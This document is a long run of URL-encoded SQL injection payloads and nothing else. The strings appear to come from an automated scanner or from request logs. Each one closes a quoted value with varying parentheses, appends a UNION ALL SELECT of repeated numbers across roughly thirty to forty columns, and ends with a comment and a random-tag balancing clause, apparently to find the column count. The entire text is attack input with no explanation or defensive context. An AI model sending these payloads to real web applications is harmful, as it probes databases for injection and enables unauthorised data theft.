-5486%22%29%29%20UNION%20ALL%20SELECT%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709%2C%207709--%20%20AND%20%28%28%22eGyW%22%3D%22eGyW -8499%22%29%29%20UNION%20ALL%20SELECT%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521%2C%205521--%20%20AND%20%28%28%22cgry%22%3D%22cgry -7895%22%29%29%20UNION%20ALL%20SELECT%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784%2C%208784--%20%20AND%20%28%28%22lxiY%22%3D%22lxiY -2920%22%29%29%20UNION%20ALL%20SELECT%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900%2C%202900--%20%20AND%20%28%28%22MILi%22%3D%22MILi -4889%22%29%29%20UNION%20ALL%20SELECT%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257%2C%205257--%20%20AND%20%28%28%22NlRB%22%3D%22NlRB -4459%22%29%29%20UNION%20ALL%20SELECT%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424%2C%205424--%20%20AND%20%28%28%22UmGa%22%3D%22UmGa -5686%22%29%29%20UNION%20ALL%20SELECT%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319%2C%208319--%20%20AND%20%28%28%22HxfK%22%3D%22HxfK -7867%22%29%29%20UNION%20ALL%20SELECT%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799%2C%205799--%20%20AND%20%28%28%22eYwC%22%3D%22eYwC -1636%22%29%29%29%20UNION%20ALL%20SELECT%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756%2C%204756--%20%20AND%20%28%28%28%22Iyau%22%3D%22Iyau -2758%22%29%29%29%20UNION%20ALL%20SELECT%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432%2C%204432--%20%20AND%20%28%28%28%22Qwlp%22%3D%22Qwlp -3143%22%29%29%29%20UNION%20ALL%20SELECT%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564%2C%202564--%20%20AND%20%28%28%28%22tZdM%22%3D%22tZdM -8687%22%29%29%29%20UNION%20ALL%20SELECT%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100%2C%203100--%20%20AND%20%28%28%28%22QOMh%22%3D%22QOMh -1446%22%29%29%29%20UNION%20ALL%20SELECT%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783%2C%208783--%20%20AND%20%28%28%28%22ihaI%22%3D%22ihaI -4530%22%29%29%29%20UNION%20ALL%20SELECT%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372%2C%204372--%20%20AND%20%28%28%28%22KQPJ%22%3D%22KQPJ -1738%22%29%29%29%20UNION%20ALL%20SELECT%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419%2C%203419--%20%20AND%20%28%28%28%22Aufa%22%3D%22Aufa -2309%22%29%29%29%20UNION%20ALL%20SELECT%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410%2C%202410--%20%20AND%20%28%28%28%22fzrv%22%3D%22fzrv -2900%22%29%29%29%20UNION%20ALL%20SELECT%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435%2C%207435--%20%20AND%20%28%28%28%22UuxI%22%3D%22UuxI -9788%22%29%29%29%20UNION%20ALL%20SELECT%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503%2C%207503--%20%20AND%20%28%28%28%22uYrb%22%3D%22uYrb -8821%22%20UNION%20ALL%20SELECT%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516%2C%203516--%20%20AND%20%22BYPu%22%3D%22BYPu -1873%22%20UNION%20ALL%20SELECT%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635%2C%202635--%20%20AND%20%22gHlH%22%3D%22gHlH -3300%22%20UNION%20ALL%20SELECT%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701%2C%205701--%20%20AND%20%22JeEs%22%3D%22JeEs -1269%22%20UNION%20ALL%20SELECT%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194%2C%204194--%20%20AND%20%22Esqg%22%3D%22Esqg -1544%22%20UNION%20ALL%20SELECT%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652%2C%202652--%20%20AND%20%22MLwf%22%3D%22MLwf -5338%22%20UNION%20ALL%20SELECT%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774%2C%203774--%20%20AND%20%22ZlqA%22%3D%22ZlqA -9742%22%20UNION%20ALL%20SELECT%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039%2C%208039--%20%20AND%20%22sPLr%22%3D%22sPLr -5053%22%20UNION%20ALL%20SELECT%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902%2C%202902--%20%20AND%20%22suoF%22%3D%22suoF -8038%22%20UNION%20ALL%20SELECT%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728%2C%209728--%20%20AND%20%22rtjQ%22%3D%22rtjQ -2759%22%20UNION%20ALL%20SELECT%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170%2C%204170--%20%20AND%20%22tBgQ%22%3D%22tBgQ -5409%22%29%20UNION%20ALL%20SELECT%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251%2C%205251--%20%20AND%20%28%22ZCVh%22%20LIKE%20%22ZCVh -6259%22%29%20UNION%20ALL%20SELECT%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635%2C%204635--%20%20AND%20%28%22vEEH%22%20LIKE%20%22vEEH -9912%22%29%20UNION%20ALL%20SELECT%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051%2C%205051--%20%20AND%20%28%22DXCG%22%20LIKE%20%22DXCG -2962%22%29%20UNION%20ALL%20SELECT%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848%2C%208848--%20%20AND%20%28%22LCgm%22%20LIKE%20%22LCgm -5076%22%29%20UNION%20ALL%20SELECT%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552%2C%207552--%20%20AND%20%28%22GRgo%22%20LIKE%20%22GRgo -6799%22%29%20UNION%20ALL%20SELECT%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311%2C%209311--%20%20AND%20%28%22WOHx%22%20LIKE%20%22WOHx -4180%22%29%20UNION%20ALL%20SELECT%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536%2C%207536--%20%20AND%20%28%22OLhm%22%20LIKE%20%22OLhm -5673%22%29%20UNION%20ALL%20SELECT%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037%2C%204037--%20%20AND%20%28%22bQZh%22%20LIKE%20%22bQZh -4031%22%29%20UNION%20ALL%20SELECT%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329%2C%203329--%20%20AND%20%28%22SaaJ%22%20LIKE%20%22SaaJ -2003%22%29%20UNION%20ALL%20SELECT%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734%2C%206734--%20%20AND%20%28%22KSBv%22%20LIKE%20%22KSBv -3364%22%29%29%20UNION%20ALL%20SELECT%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825%2C%208825--%20%20AND%20%28%28%22EHZa%22%20LIKE%20%22EHZa -5451%22%29%29%20UNION%20ALL%20SELECT%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177%2C%205177--%20%20AND%20%28%28%22TkyH%22%20LIKE%20%22TkyH -5775%22%29%29%20UNION%20ALL%20SELECT%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662%2C%207662--%20%20AND%20%28%28%22fHBK%22%20LIKE%20%22fHBK -9464%22%29%29%20UNION%20ALL%20SELECT%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438%2C%202438--%20%20AND%20%28%28%22PNIb%22%20LIKE%20%22PNIb -8626%22%29%29%20UNION%20ALL%20SELECT%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859%2C%201859--%20%20AND%20%28%28%22Euom%22%20LIKE%20%22Euom -4871%22%29%29%20UNION%20ALL%20SELECT%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526%2C%206526--%20%20AND%20%28%28%22wtnP%22%20LIKE%20%22wtnP -5759%22%29%29%20UNION%20ALL%20SELECT%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801%2C%203801--%20%20AND%20%28%28%22vsqt%22%20LIKE%20%22vsqt -9701%22%29%29%20UNION%20ALL%20SELECT%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235%2C%201235--%20%20AND%20%28%28%22kmIT%22%20LIKE%20%22kmIT -2350%22%29%29%20UNION%20ALL%20SELECT%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303%2C%207303--%20%20AND%20%28%28%22LOAR%22%20LIKE%20%22LOAR -4095%22%29%29%20UNION%20ALL%20SELECT%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407%2C%205407--%20%20AND%20%28%28%22EjPC%22%20LIKE%20%22EjPC -8678%22%29%29%29%20UNION%20ALL%20SELECT%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899%2C%206899--%20%20AND%20%28%28%28%22YIlC%22%20LIKE%20%22YIlC -4281%22%29%29%29%20UNION%20ALL%20SELECT%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512%2C%206512--%20%20AND%20%28%28%28%22FmAC%22%20LIKE%20%22FmAC -9680%22%29%29%29%20UNION%20ALL%20SELECT%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721%2C%202721--%20%20AND%20%28%28%28%22VcZx%22%20LIKE%20%22VcZx -4305%22%29%29%29%20UNION%20ALL%20SELECT%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274%2C%207274--%20%20AND%20%28%28%28%22vKQG%22%20LIKE%20%22vKQG -8324%22%29%29%29%20UNION%20ALL%20SELECT%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003%2C%208003--%20%20AND%20%28%28%28%22jrTT%22%20LIKE%20%22jrTT -4582%22%29%29%29%20UNION%20ALL%20SELECT%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616%2C%204616--%20%20AND%20%28%28%28%22GauW%22%20LIKE%20%22GauW -5233%22%29%29%29%20UNION%20ALL%20SELECT%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850%2C%208850--%20%20AND%20%28%28%28%22hKbM%22%20LIKE%20%22hKbM -8880%22%29%29%29%20UNION%20ALL%20SELECT%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037%2C%206037--%20%20AND%20%28%28%28%22aSKc%22%20LIKE%20%22aSKc 